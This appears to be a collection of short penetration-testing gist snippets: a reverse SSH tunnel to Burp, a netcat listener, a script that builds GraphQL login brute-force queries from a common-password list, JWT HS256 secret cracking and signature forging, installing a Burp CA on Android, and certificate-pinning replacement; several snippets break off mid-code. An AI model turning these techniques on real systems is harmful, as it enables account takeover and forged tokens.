sathishshan

Generate a certificate for the SAML app

openssl req -x509 -sha256 -nodes -days 365 -newkey rsa:2048 -keyout privateKey.key -out certificate.crt



Refs:
https://faq.miniorange.com/knowledgebase/can-generate-certificate-saml-app/
https://stackoverflow.com/questions/48397927/where-to-get-a-saml-certificate
https://www.samltool.com/self_signed_certs.php

sathishshan

Remote Traffic to Localhost -> Ex: Curl to Burp

Tunnel Establishment:
ssh -fNT -R 8080:localhost:8080 username@IP

Test Run:
curl -svk https://www.google.com -x http://localhost:8080

-----------------------------------------------------------------------------------

sathishshan

while true; do nc -l localhost 8888; done

curl localhost:8888
curl -F [email protected] -F [email protected] localhost:8888

sathishshan

copy(`123456,password,12345678,qwerty,123456789,12345,1234,111111,1234567,dragon,123123,baseball,abc123,football,monkey,letmein,shadow,master,666666,qwertyuiop,123321,mustang,1234567890,michael,654321,superman,1qaz2wsx,7777777,121212,000000,qazwsx,123qwe,killer,trustno1,jordan,jennifer,zxcvbnm,asdfgh,hunter,buster,soccer,harley,batman,andrew,tigger,sunshine,iloveyou,2000,charlie,robert,thomas,hockey,ranger,daniel,starwars,klaster,112233,george,computer,michelle,jessica,pepper,1111,zxcvbn,555555,11111111,131313,freedom,777777,pass,maggie,159753,aaaaaa,ginger,princess,joshua,cheese,amanda,summer,love,ashley,nicole,chelsea,biteme,matthew,access,yankees,987654321,dallas,austin,thunder,taylor,matrix,mobilemail,mom,monitor,monitoring,montana,moon,moscow`.split(',').map((element,index)=>`
bruteforce$index:login(input:{password: "$password", username: "<USERNAME>"}) {
        token
        success
    }
`.replaceAll('$index',index).replaceAll('$password',element)).join('\n'));console.log("The query has been copied to

sathishshan

HS256 - Weak Signing Key: Brute Force

hashcat -a 0 -m 16500 <JWT TOKEN> /path/to/jwt.secrets.list

npm install jwt-cracker
jwt-cracker <token> [<alphabet>] [<maxLength>]

HS256 - Extracting Public Key from JWT token:

https://github.com/silentsignal/rsa_sign2n/tree/release/standalone

sathishshan

HS256 - Signature:

echo -n "<JWT Base64url encoded - Header.Payload>" | openssl dgst -sha256 -hmac '<SECRET>' -binary | openssl base64 

The output of the signature will give base64 encoding, convert that to base64url encoding

SZf1eovdqV+1mo8rvI79UxQT3Ue/mJd3ipXu8XO01os=

Change (+ to -), (/ to _), (Omit the padding == or =)

sathishshan

openssl x509 -inform der -in cacert.der -out burp.pem
openssl x509 -inform pem -subject_hash_old -in burp.pem
openssl x509 -inform pem -subject -in 9a5ba575.0

mv burp.pem 93f6f67f.0

adb push 93f6f67f.0 /system/etc/security/cacerts

adb shell

sathishshan

import socket, sys, time

def listen(ip,port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((ip, port))
    s.listen(1)
    print("Listening on port " + str(port))
    conn, addr = s.accept()
    print('Connection received from ',addr)
    while True:

sathishshan

Adding/Replacing the PublicKey in mobile application (FingerPrint):

Generating SHA256 hash from the Burp cert:

// It generates Publickey from the Burp Certificate

$ openssl x509 -inform der -in burp_CA.der -pubkey -noout -out burp.pub


// It converts burp publickey to base64 encoded format

sathishshan

// ==UserScript==
// @name           Login_MO
// @namespace      Auto_Login
// @description    Login_Auto
// @version        1.0
// @match          https://site.com
// @run-at         document-start
// ==/UserScript==

window.addEventListener('load', function() {